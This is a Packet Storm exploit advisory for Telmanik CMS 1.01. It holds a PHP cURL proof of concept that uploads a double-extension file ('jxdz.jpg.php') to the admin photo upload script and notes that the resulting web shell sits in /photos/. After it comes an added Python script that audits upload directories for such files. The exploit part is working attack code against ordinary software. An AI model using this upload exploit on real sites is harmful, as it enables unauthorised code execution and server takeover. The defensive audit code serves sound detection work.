Telmanik CMS 1.01 Shell Upload

2013-12-13T00:00:00
ID PACKETSTORM:124423
Type packetstorm
Reporter JoKeR_StEx
Modified 2013-12-13T00:00:00

Description

                                        
                                            `/*  
##########################################################################  
  
Exploit title : telmanik cms v1.01 File Upload  
  
Date : 12/12/2013  
  
Author : JoKeR_StEx  
  
Software Link : http://www.telmanik.com/open-source.php  
  
Tested On : WinXP PRO SP3  
  
CVE : [~]  
  
Version : 1.01  
  
#########################################################################  
*/  
  
1) File Upload  
  
P.O.C  
  
<?php

# <3Algeria<3

// Upload endpoint of a local test installation
$web = "http://127.0.0.1/telmanik/upload/admin/photo_upload.php";
$dz = curl_init();
// Local file to send; its name carries a double extension
$shell = "jxdz.jpg.php";
curl_setopt($dz, CURLOPT_URL, $web);
curl_setopt($dz, CURLOPT_RETURNTRANSFER, true);
curl_setopt($dz, CURLOPT_HEADER, false);
curl_setopt($dz, CURLOPT_VERBOSE, false);
curl_setopt($dz, CURLOPT_POST, true);
// "image1" is the form field; the "@" prefix sends the file as a multipart upload
$jxarray = array("image1" => "@" . $shell);
curl_setopt($dz, CURLOPT_POSTFIELDS, $jxarray);
$exec = curl_exec($dz);
curl_close($dz);

?>
  
// The uploaded shell can then be found in /photos/
  
`
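A defender-side check for the condition this advisory describes, a file such as `jxdz.jpg.php` accepted by `photo_upload.php` and stored under `/photos/`: the Python below is an added example (not part of the original advisory or of Telmanik CMS) that audits an upload directory for files carrying an interpreter extension or whose content is not an image. The extension list, function names and sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Extensions a PHP-enabled server may pass to the interpreter (assumed list).
EXEC_EXT = {"php", "php3", "php4", "php5", "phtml", "phar", "pht"}
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
SCRIPT_TAG = re.compile(rb"<\?(php|=|\s)", re.I)  # heuristic for PHP open tags


def audit_file(path):
    """Return the reasons a stored upload looks suspicious (empty list = clean)."""
    reasons = []
    # Check every dot-separated part: both x.jpg.php and x.php.jpg are worth a flag.
    parts = Path(path).name.lower().split(".")[1:]
    if any(p in EXEC_EXT for p in parts):
        reasons.append("executable-extension")
    with open(path, "rb") as fh:
        data = fh.read(1024 * 1024)  # cap the read at 1 MiB
    if not data.startswith(IMAGE_MAGIC):
        reasons.append("not-an-image")
    if SCRIPT_TAG.search(data):
        reasons.append("script-tag-in-content")
    return reasons


def audit_dir(root):
    """Map each flagged file (path relative to root) to its list of reasons."""
    findings = {}
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and (reasons := audit_file(p)):
            findings[p.relative_to(root).as_posix()] = reasons
    return findings


def demo():
    """Audit constructed sample files written to a temporary directory."""
    samples = {  # constructed content, not taken from a real site
        "holiday.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
        "jxdz.jpg.php": b"<?php /* placeholder */ ?>",
        "logo.gif": b"GIF89a<?php /* placeholder */ ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            (Path(root) / name).write_bytes(body)
        return audit_dir(root)

if __name__ == "__main__":
    print(demo())
```

Point `audit_dir` at the installation's photo directory; the content checks are heuristics, so treat a hit as a file to inspect rather than a verdict.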